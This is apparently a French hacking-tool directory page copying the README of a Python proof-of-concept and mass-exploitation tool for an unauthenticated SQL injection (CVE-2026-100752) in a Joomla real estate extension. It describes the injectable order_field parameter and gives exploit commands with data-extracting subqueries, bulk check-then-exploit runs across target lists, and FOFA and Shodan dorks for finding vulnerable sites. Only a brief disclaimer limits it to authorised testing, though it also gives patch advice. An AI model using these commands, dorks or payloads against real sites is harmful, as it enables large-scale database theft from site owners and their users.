Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-100752 — PoC Python 3 et exploit de masse pour CVE-2026-100752, une injection SQL non authentifiée dans OrdaSoft Joomla Real Estate Manager <=6.7.8 via le paramètre order_field ORDER BY. | Kitploit
Outils/GitHubGitHub/murrez/cve-2026-100752
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationScripting et AutomatisationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmurrez/cve-2026-100752

CVE-2026-100752

il y a 4 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

PoC Python 3 et exploit de masse pour CVE-2026-100752, une injection SQL non authentifiée dans OrdaSoft Joomla Real Estate Manager <=6.7.8 via le paramètre order_field ORDER BY.

Voir le dépôt
Partager

CVE-2026-100752 — Injection SQL non authentifiée dans OrdaSoft Real Estate Manager (Free)

PoC Python 3 pour CVE-2026-100752 — extension Joomla OrdaSoft Real Estate Manager (Free) ≤ 6.7.8. Corrigé dans 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Cataloguehttps://pocbit.org/pocs/
Composantcom_realestatemanager
Fichiersite/realestatemanager.php
Paramètreorder_field → ORDER BY (non quoté, pas de liste blanche)
AuthAucune (vues publiques listing / recherche / catégorie)
CWECWE-89 Injection SQL
AussiInjection POST héritée order_direction (audits Metasploit / pré-6.7.9)

Sortie du PoC (capture d'écran)

Bannière PoCbit colorée, puis sortie JSON --mode exploit : exploited: true, vecteur order_field_get, route showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Exemple de commande :

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(Capture d'écran issue d'un environnement de test autorisé ; l'URL cible est destinée à la validation du PoC.)


Résumé de la vulnérabilité (Türkçe)

Real Estate Manager (Free) est une extension OrdaSoft qui gère les annonces immobilières sur Joomla. Dans les versions 6.7.8 et antérieures, le paramètre de requête order_field est inséré directement dans la clause ORDER BY au sein de site/realestatemanager.php ; il n'y a ni liste blanche de noms de colonnes, ni échappement, ni cast. Sans authentification, les requêtes de navigation par catégorie, de résultats de recherche et de liste complète d'annonces peuvent être exploitées.

En cas de SQLi réussie, il convient d'évaluer la lecture depuis la base de données (version, hachages d'utilisateurs, données du site), l'écriture/suppression selon les privilèges, ainsi que le risque de RCE en chaîne. Mettez à niveau vers la version 6.7.9 ou supérieure (OrdaSoft security release).


Mécanisme technique

Contrôleur frontal Joomla :

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752 : order_field contrôle la colonne/expression ORDER BY. Des valeurs telles que des sous-requêtes basées sur les erreurs peuvent être injectées car la valeur est concaténée dans le SQL sans liaison ni validation.

Contextes de requête affectés (selon le texte du CVE) :

  1. Navigation par catégorie (showCategory et apparentés)
  2. Résultats de recherche
  3. Liste complète des biens

Ce PoC :

  • Empreinte de com_realestatemanager (chemins + version optionnelle du manifeste)
  • Extraction de catid / Itemid depuis le HTML du site
  • Sondage des tâches : showCategory, showSearch, showSearchResult, showRent, showBuy
  • Principal : GET et POST basés sur les erreurs via order_field
  • Repli : order_direction=asc,<injection> (vecteur historique, encore utile sur certaines versions)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (lignes avec fuite SELECT réussie)

Prérequis

cd CVE-2026-100752
pip install -r requirements.txt

Utilisation

Cible unique — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive tente SELECT VERSION() lorsque la preuve booléenne/erreur n'est pas concluante.

Cible unique — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Traitement en masse

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
OptionRôle
--mode exploitExtraction de données basée sur les erreurs (masse prise en charge)
--subquerySQL interne pour la charge utile double requête CONCAT(0x7e, …)
--vectorForce order_field_get, order_field_post ou order_direction_post
-jCibles en parallèle
--no-colorTerminal en clair

JSONL inclut pocbit, pocbit_catalog, pocbit_page, cve, component.


Dorks FOFA / découverte d'actifs

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Style Shodan (si pris en charge) : http.html:com_realestatemanager

Exportez les noms d'hôtes dans targets.txt (une URL par ligne), puis check → hits → exploit uniquement sur des biens autorisés.


Détection de version

Manifeste (lorsqu'exposé) :

  • /administrator/components/com_realestatemanager/realestatemanager.xml

Si version ≤ 6.7.8 → likely_vulnerable_version. Si ≥ 6.7.9 → patched_version (l'exploit peut encore échouer).


CVE associés (même train de version)

CVETypeCorrigé
CVE-2026-100752SQLi non auth (order_field)6.7.9
CVE-2026-100753XSS réfléchi (vues publiques de biens)6.7.9

Même lot éditeur (sept. 2026) : Vehicle Manager et d'autres extensions OrdaSoft ont reçu des CVE distincts — corrigez tous les composants OrdaSoft que vous exécutez.


Références

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six failles dans trois extensions OrdaSoft (sept. 2026)
  • Metasploit : auxiliary/gather/joomla_com_realestatemanager_sqli (POST hérité order_direction)

Légal

Tests de sécurité autorisés et validation de correctifs uniquement. Ne pas utiliser contre des systèmes sans autorisation.


Description du dépôt GitHub

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Télécharger l’outil